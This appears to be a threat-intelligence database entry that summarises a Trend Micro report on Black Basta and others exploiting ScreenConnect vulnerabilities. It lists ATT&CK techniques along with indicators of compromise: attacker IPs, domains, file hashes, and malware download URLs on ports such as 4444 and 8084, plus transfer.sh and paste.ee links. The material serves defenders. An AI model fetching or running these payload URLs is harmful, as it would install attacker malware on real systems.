Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
Tags
cmtmf-attack-pattern: Exploit Public-Facing Application
country: Belgium
attack-pattern: Data Direct Data Encrypted For Impact - T1471 Data Encrypted For Impact - T1486 Default Accounts - T1078.001 Dns - T1071.004 Dns - T1590.002 Domain Trust Discovery - T1482 Domains - T1583.001 Domains - T1584.001 Email Account - T1087.003 Exfiltration Over C2 Channel - T1646 Exploit Public-Facing Application - T1377 Exploits - T1587.004 Exploits - T1588.005 Impair Defenses - T1562 Impair Defenses - T1629 Ingress Tool Transfer - T1544 Local Account - T1087.001 Local Accounts - T1078.003 Malware - T1587.001 Malware - T1588.001 Msiexec - T1218.007 Powershell - T1059.001 Remote Access Software - T1663 Rundll32 - T1218.011 Screensaver - T1546.002 Server - T1583.004 Server - T1584.004 Software - T1592.002 Tool - T1588.002 Vulnerabilities - T1588.006 Account Discovery - T1087 Exfiltration Over Command And Control Channel - T1041 Exploit Public-Facing Application - T1190 Remote File Copy - T1105 Powershell - T1086 Remote Access Tools - T1219 Rundll32 - T1085 Screensaver - T1180 Exploit Public-Facing Application
Show in Graph
Common Information
Type Value
UUID 161f910e-475f-4558-9a41-65f087ee38a6
Fingerprint a4762cd0e33f8f87
Analysis status IN_PROGRESS
Considered CTI value 2
Text language
Published Feb. 27, 2024, midnight
Added to db Oct. 15, 2024, 3:40 p.m.
Last updated Nov. 17, 2024, 6:56 p.m.
Headline Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
Title Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
Detected Hints/Tags/Attributes 103/3/72
Source URLs
Redirection Url
Details Source https://www.trendmicro.com/en_ph/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_hk/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_ca/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_th/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_nl/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_ae/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_se/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_be/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_no/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_id/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_dk/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_ie/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_gb/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details Source https://www.trendmicro.com/en_fi/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
URL Provider
Details Provider Source level domain
Details trendmicro.com www.trendmicro.com
Attributes
Details Type #Events CTI Value
Details CVE 25 
cve-2024-1708
Details CVE 29 
cve-2024-1709
Details CVE 140 
cve-2023-27350
Details Domain 5 
wipresolutions.com
Details Domain 2 
dns.artstrailreviews.com
Details Domain 45 
paste.ee
Details Domain 2 
input-beats.gl.at.ply.gg
Details Domain 71 
transfer.sh
Details Domain 2 
instance-tj4lui-relay.screenconnect.com
Details Domain 272 
outlook.com
Details Email 2 
integratorlogin=pichet1208@outlook.com
Details File 11 
web.dll
Details File 6 
setupwizard.aspx
Details File 2 
screenconnect.zip
Details File 3 
screenconnect.core
Details File 256 
net.exe
Details File 49 
nltest.exe
Details File 1208 
powershell.exe
Details File 2 
diablo.log
Details File 2 
c:\users\public\diablo.log
Details File 1018 
rundll32.exe
Details File 2 
09d.log
Details File 2 
c:\users\public\09d.log
Details File 2 
10443.exe
Details File 2 
c:\users\public\10443.exe
Details File 1122 
svchost.exe
Details File 226 
certutil.exe
Details File 3 
msappdata.msi
Details File 3 
c:\mpyutd.msi
Details File 409 
c:\windows\system32\cmd.exe
Details File 2 
c:\mpyuts.msi
Details File 2 
read_instructions_to_decrypt.txt
Details File 2 
chromeset.exe
Details File 2 
c:\chromeset.exe
Details File 18 
c:\windows\system32\net.exe
Details File 5 
c:\windows\system32\bitsadmin.exe
Details File 2 
c:\programdata\sc.exe
Details File 27 
c:\windows\system32\msiexec.exe
Details File 20 
setup.msi
Details sha256 1 
11d2dde6c51e977ed6e3f3d3e256c78062ae41fe780aefecfba1627e66daf771
Details sha256 2 
cc13b5721f2ee6081c1244dd367a9de958353c29e32ea8b66e3b20b293fabc55
Details sha256 2 
fa131238c3c35efe99cde59dd409c0436fd642b6bf5d56f994f52ab3a62bae4e
Details sha256 2 
e3401d7699cc5067620e43bd24e8ccd437832c16f2fa7d5baaad8c170383cc92
Details sha256 3 
8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600
Details sha256 2 
3a659609850664cbc0683c8c7b92be816254eb9306e7fb12ad79d5a9af0fb623
Details sha256 2 
47d83461ee57031fd2814382fb526937a4cfa9a3eea7a47e4e7ee185c0602b27
Details sha256 2 
86b5d7dd88b46a3e7c2fb58c01fbeb11dc7ad350370abfe648dbfad45edb8132
Details IPv4 3 
159.65.130.146
Details IPv4 3 
23.26.137.225
Details MITRE ATT&CK Techniques 43 
T1078.003
Details MITRE ATT&CK Techniques 124 
T1482
Details MITRE ATT&CK Techniques 41 
T1078.001
Details MITRE ATT&CK Techniques 179 
T1087
Details MITRE ATT&CK Techniques 460 
T1059.001
Details MITRE ATT&CK Techniques 235 
T1562
Details MITRE ATT&CK Techniques 492 
T1105
Details MITRE ATT&CK Techniques 22 
T1087.003
Details MITRE ATT&CK Techniques 72 
T1087.001
Details MITRE ATT&CK Techniques 141 
T1219
Details MITRE ATT&CK Techniques 542 
T1190
Details MITRE ATT&CK Techniques 422 
T1041
Details MITRE ATT&CK Techniques 472 
T1486
Details Url 2 
http://207.[246.74.189:804/download/diablo.log
Details Url 2 
http://51.[195.192.120:804/download/09d.log
Details Url 2 
http://198.[244.169.213:8045/download/10443.exe
Details Url 2 
http://159.65.130.146:4444/a
Details Url 2 
http://159.65.130.146:4444/svchost.exe
Details Url 3 
http://23.26.137.225:8084/msappdata.msi
Details Url 2 
http://23.26.137.225:8091/chromeset.exe
Details Url 2 
https://paste.ee/r/mzeoz/0
Details Url 2 
https://paste.ee/r/pxlkv/0
Details Url 2 
https://transfer.sh/get/hcrhqun0yc/temp3.exe